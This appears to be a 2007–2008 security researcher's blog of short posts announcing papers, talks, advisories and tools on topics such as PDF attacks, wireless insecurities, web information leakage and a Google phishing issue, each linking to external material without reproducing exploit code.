Having said what our mission is, our approach is to successfully make our moves that take us closer towards our mission. Most of our projects are based on the data that has been collected by the others. Creating new projects on existing stuff or recycling the wheel is not the EvilFingers approach. What we aim at doing is to map the existing data that is out there in the free world, by using the meaningful mapping vectors and thereby finding out the missing pieces of the puzzle. Once the missing pieces are found, Wallah! We are done with our purpose. The work beyond our mission is to envision a future without any missing pieces and to set our goals to fill them up with our newer projects.

EVIL FINGERS

I will be leading one of the team for security projects. You can check this here:

Members at Evil Fingers.

Regards
0kn0ck

Traversing Dismantled Codes - Tactical Testing / Facebook Case Study

2008-06-18T12:50:00.000-07:00

With the ever increasing demand of technology in service industry the service lines are getting messed up. There are lot of unmanaged stuff out there on the web. Developers do not check most of the code in websites but add related modules continuously with passage of time.So the website becomes a pool of messed web pages. There can be broken links or dismantled codes. As a result of which some code structures work fine with most of web pages and vice versa. A kind of insecurity persist in this.

Download the Case Study ; FaceBook Case Study

Regards
0kn0ck

EuSecWest Speakers Snapshot at Flickr

2008-06-10T11:48:00.000-07:00

The EuSecWest 2008 Speaker snapshots have been released at Flicker. You can see the pics directly from there.

Link:EuSecWest 2008 Speaker Pics

Enjoy , Regards
0kn0ck

EuSecWest / Core 08 Security Conference on the way

2008-05-20T08:35:00.000-07:00

The EuSecwest 08 is on the way. This time I am speaking on PDF Attacks Vulnerability Vectors. The talk relates to:

"The PDF has direct impact from security point of view to application surface and low level system layer. This talk will discuss the internals of PDF and how the objects are organized and the application attack surface. Underlined attacks that comes to play through PDF will be explained. Phishing attacks, exploiting ADODB and ODBC functionality, PDF backdoors, dynamic and infections through JavaScript will be discussed."

More Details you can find at:

http://www.eusecwest.com

Regards
0kn0ck

Hackers Belief - Road to Power Hack

2008-04-25T08:47:00.000-07:00

Ever since a new element originated in the hack matrix a stringent war of power starts with a belief to own it. The journey begins with a command line control to prove the authority. But with a flourishing world it has been noticed that belief works on the duo side of power stroke of hacking. One side holds belief of construction of security rods in the matrix. It is done to strengthen the matrix base.The other side holds the belief of breaking a matrix consistency thereby dethroning the control of security realm. The matrix flourishes day by day and its sphere is getting enlarged. The limits of this matrix are hard to traverse because of fusion of positive and negative objects.The coagulation of other security parameters result in hard knock hacks that are hard to dissect.

For more:-

http://www.secniche.org/hacker_belief.html

Regards
0kn0ck

Hakin9 Paper : Breaking in Malware Add Ons

2008-04-14T02:58:00.000-07:00

This paper covers the working functionality of Malware Add-ons. The add-ons are called Application Extension programs that enhance the functionality of a program. The web browsers use a number of Add-ons as browser helper objects. The transformations in technology have increased the incidence of Malwares.

Malwares perform rogue functioning by keeping the identity intact with systems. No doubt the front end remains the same but the working strategy is different. This paper deals specifically with Malware application extensions and its deleterious impacts on the system. Internet Explorer case study will be undertaken to dissect the internal structure of Add-ons.

http://www.hakin9.org/prt/view/latest-issue/issue/807.html

Regards
0kn0ck

Are Security Portals Secure Enough - Search Security Tectarget Case Study

2008-04-03T05:47:00.000-07:00

This issue comes to play when I was checking an article stuff on SearchSecurity Techtarget. The article is linked through CGISecurity. The article was "The essentials of Web application threat modeling".A little sarcasm occurs after a bit of testing.

Security is everywhere. The security industry is growing rapidly or the business is growing. Are the quality of applied web security is enough to prevent number of attacks. One can find number of security websites providing content such as security papers , tools etc. The basic realm is to provide the security resources. The resources are hosted on number of security driven websites.As the security is a base element to provide to the community.

For More:

http://cera.secniche.org/se_tag.html

Regards
0kn0ck

Usenix ;login : Hacking 802.11 Protocol Insecurities - The Other Side

2008-04-02T08:26:00.000-07:00

Base : Security and Privacy are two critical entities of any communication protocol. Security itself is a prerequisite for robust implementation of networks. In this article,I dissect the 802.11 [1] protocol attacks possible because of persistent problems in wireless networks. Before going into the attack patterns against the protocol, I will briefly describe how 802.11 works by splitting frames into functional objects.

http://www.usenix.org/publications/login/2008-04/index.html

You can download the paper by logging directly to USENIX portal.

Regards
0kn0ck

Game Servers Information Leakage - Vulnerable Server Files.

2008-03-29T10:23:00.000-07:00

The game environment is on of the pre-dominant working stature of various games running on web servers. The configuration plays a crucial role in management of these game files on the server. Basically it has been noticed that structure of game file is well defined in a relative files. After pen testing and auditing number of web servers serving online games, it has been found that number of game servers are prone to information leakage through configuration files.

More: http://cera.secniche.org/game_ser.html

Regards
0kn0ck

Exposure of Vulnerable Backup Files on Web Servers

2008-03-27T00:47:00.000-07:00

The backup procedure is considered to be as one of the best practise of administrative working. This has been seen several times that administrators make backup and placed them on the server with same access as of other files. This is matter of great concern because these backup files can be crawled easily there by leveraging enormous amount of information of web server and configuration of the applications. This is a basic problem of poor web administration.

For more:

CERA || Exposure of Backup Files.

Regards
0kn0ck

Information Leakage - Vulnerable and Open Checks on Awstats and Webalizer Executable Scripts

2008-03-16T00:39:00.001-07:00

The traffic analyzers are used to keep a track on the incoming packets and the type of resource requested. It not only encompass the working procedure but also the bandwidth and resource utilization. The raw stats provide the way request is made by the client or user. This helps in understanding the flow of traffic and the place from where it originates. The vulnerable and open awstats provide plethora of information. You can see the analysis on:

CERA | Awstats/ Webalizer Open Check

Regards
0kn0ck

Mlabs : Vulnerability Risk Randomization - Wireless Networks - Paper Released

2008-03-11T08:44:00.001-07:00

This paper provides a reflection on the vulnerability scenario with reference to wireless system errors and various security vectors. The vulnerability risk randomization entirely depends on handling and control of security vectors. Despite of number of vulnerability assessment methodologies and deployment techniques, the bugs still continue to flourish. The inferences from various cases do still not suffice enough to thwart the bugs originating from the system. The vulnerability is always disseminated by post influential measures. The risk of vulnerability randomization is high from security perspective.. The security realm is based on bug existence and vulnerability patching. The induction of randomization factor in vulnerability finding has made the task onerous.

For detail lookup visit : MLABS

Regards
0kn0ck

New Hakin9 Paper : Reverse Engineering Binaries : Level 2 Checks

2008-03-04T18:39:00.000-08:00

This paper describes a Level 2 practical analysis of a window binary. It covers the methodical approach to reverse engineer an executable. The binary can be a console program or GUI based. The point of this talk is to understand a hierarchical layout to reverse an application within specific time limits.

http://www.hakin9.org/prt/view/about-the-mag/issue/691.html

Richard' Bejtlich View: Tao Security Blog

0kn0ck

New Tools Added : Track

2008-02-14T06:06:00.000-08:00

I have added new tools on secniche portal. The brief introduction is provided below:

1. brbind_v(1.0) : It basically brutes the listening sockets for the flags and the provide the stateful information. It also provides raw stats for protocol used by system itself.

2. pemap_v(1.0) : This tool dissects the any portable executable file into its relative composite objects like debug directory stats , function entry points , raw data , headers etc. Good for portable executive mapping.

3. gs_cookie_gen : This tool projects simply the working behavior of guard stack cookies. The cookie generation is based on different system functions.

Link : http://www.secniche.org/tool.html

Thread Profiling Checks : Code Prominence

2008-02-09T08:59:00.000-08:00

This entry strictly deals with the Thread Optimization Checks. When the concept of optimization is undertaken the Profiling of code is a Logical aspect that has to follow. For smaller segments of code [ single line command execution] , process of Micro profiling is followed. When larger codes are encountered , the Macro profiling is applied. When any process is initialized , threads will be generated based on the code that is executing. For all type of functions defined and called , it will generate a thread in system state during execution. The Instruction Usage plays a crucial role in Profiling.

http://www.openrce.org/blog/view/1050/Thread_Optimization_Checks_:_Code_Prominence

0kn0ck

Usenix ;login Feature New Research Paper : Insecurities in Designing in XML Signatures

2008-02-05T03:13:00.000-08:00

This article encompasses the practical problems in designing XML signatures through the use of APIs. XML signatures are used to provide security to data of any kind whether XML or binary. The confidentiality, integrity, and authenticity of the message has to be preserved when designing a SOAP request for communication. XML API functionality is very versatile but at the same time protection measures have to be included to prevent loss of data.

http://www.usenix.org/publications/login/2008-02/index.html

0kn0ck

CyTrap Labs Projected WAZ Evaluation Sheet

2008-01-23T03:10:00.000-08:00

Cytrap Labs has generated a evaluation sheet for Windows Anti Zomb Tool. You can see the details on the Cytrap Lab Blog :

http://blog.cytrap.eu/?p=310
http://cytrap.eu/radio_show/newsletter/newsletter93.html

0kn0ck

MAC Adapters Curb on SLIP/PPP : Tools Sanitization

2007-12-13T09:04:00.000-08:00

The adapter connection over SLIP/PPP shows a problematic behavior when certain tools are used. The problem most of the tools found is getting the right adapter
info. As a result of this number of tools does not respond well. For Example :
TCP based traceroute for windows platform i.e. tracetcp. Tcptraceroute is tool
that uses TCP functionality to trace the destination on Linux. The similar
implementation is tracetcp on windows. The problem arise when this tool fails to
respond with SLIP/PPP.

Read:
http://triosec.secniche.org/concepts/slip_ppp.txt

zknk

[Whitepaper] Information Prone LDAP Garbage Dumps

2007-12-03T07:42:00.000-08:00

The LDAP garbage dump that remains on web server results in information disclosure. Security of LDAP may be compromised, if for instance a search engine crawls through untamed directories on the web server and finds information through the ldap.xml file. This type of harvesting attack is also termed static information leveraging attack.This article provides methods for dealing with this type of attack and clarifying how to secure LDAP.The ldap.xml file, often remains on the server due to either misconfiguration or improper server administration.

More:http://secniche.org/papers/Inf_Pr_Ldap_Gar_Dumps.pdf

Regards
zknk

Web Registration Attacks : Digging in.

2007-11-28T00:05:00.000-08:00

The registration attacks are on high now days.It actually comprise of the definitive manipulation in the databases through fake user registration. The database is flooded with users through poorly coded registration pages. You might have seen many registration pages with input arguments as user name, password, email , address etc. The specified arguments are placed as controls on web page. The attackers are very crafty in their approach of infecting the web applications.

More:

http://triosec.secniche.org/concepts/reg_attack.txt

TCP Port Sequence Check : Port Querying

2007-11-24T20:37:00.000-08:00

The point of talk is to check the port status with the incoming TCP sequence from the target. It is one of the reliable technique in determining the port status. No doubt from standard a debugged response from the target will provide you the status of flags efficiently. Sometimes with simple TCP Sequence check the port structure can be verified. We are going to prove this by HPing packet crafting to dissect the TCP sequence number.

For more:
http://triosec.secniche.org/concepts/tcp_seq_port.txt

zknk

SecNiche Project : Reversing System Semantics

2007-11-22T00:57:00.000-08:00

SecNiche has stated a new project on reverse engineering.This project is dedicated to reverse engineering. It comprise of drafts and papers explaining the different techniques that are used differentially during analysis.

http://reversing.secniche.org

zknk

Google Acted Slowly : The Translation Issue is Corrected

2007-11-11T10:17:00.001-08:00

As I stated earlier in my post regarding Google Translation Issue.After long time it has been undertaken by Google and has been corrected.The Google has stopped the English to English Translation. Even if you strip off the parameters and try to redirect it would not be possible.

http://translate.google.com/translate?u=http://www.packetstormsecurity.org

You can find the original layout:

http://zeroknock.blogspot.com/2007/01/google-tranlate-prone-to-redirection.html

The issue is positively corrected after long time.

OS Specification Check : IP ID Testing

2007-11-11T09:50:00.000-08:00

The IP ID field is critical part in designing and crafting of packets. Mostly the ID field play a generic role when ever a response is undertaken from destination. There are certain facts about ID which enhances the mode of penetration testing in which it is going to be performed.

check : http://triosec.secniche.org/concepts/ip_id_os_det.txt

Cheers

Google News Network Phishing Vulnerability

2007-10-29T02:54:00.000-07:00

Recent times lot of vulnerabilities have been stated in Google network.It has been noticed that Google news network is fallible to phishing and also to third party attacks. It has been advised to Google. no doubt Google acknowledges. You can look into detailed advisory at:

http://secniche.org/advisory/GoogleNewsPhish.pdf

Only Google knows when the security measures to be taken and applied.

Cheers.

Take Down Zombies : DNS Sanitization and BOTNETS

2007-10-26T22:44:00.000-07:00

I have recently added slides of my latest talk presented at CERT-IN.The slides and demonstration layout material have been added to the website. The talk basically revolves around DNS protocol problems that are further exploited by attackers in launching DDoS amplification attacks and other stringent problems.

Download : http://www.secniche.org/talks/take_down_zombies_2007_aks_oknock.pdf

AkS